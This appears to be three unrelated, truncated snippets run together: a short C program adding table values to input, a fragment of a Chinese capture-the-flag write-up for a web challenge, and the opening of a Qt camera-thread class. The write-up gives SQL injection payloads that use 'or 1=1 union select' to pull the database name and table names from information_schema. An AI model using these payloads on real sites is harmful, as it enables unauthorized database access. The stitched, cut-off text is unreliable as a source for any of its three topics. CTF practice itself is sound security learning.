#include<stdio.h> int a[21]={0,1,2,3,4,10,11,12,13,19,20,21,22,28,29,30,31,37,38,39,40}; int main() { int n,m; while(scanf("%d%d",&m,&n)!=EOF) { printf("%d\n",m+a[n]); } re
web签到 查看源代码解码即可 web2 SQL注入,我之前是没遇到这种格式的长了新姿势 ' or 1=1 union select 1,database(),3 limit 1,2;#' or 1=1 union select 1,(select table_name from information_schema.tables where table_schema='web2' lim
效果图 目录文件 camerathread.h 功能实现全写在.h里了 class CameraThread : public QThread{Q_OBJECTpublic:CameraThread(){//打开序号为0的摄像头m_cap.open(0);if (!m_cap.isOpened()) {qDebug() << "Error: Cannot open came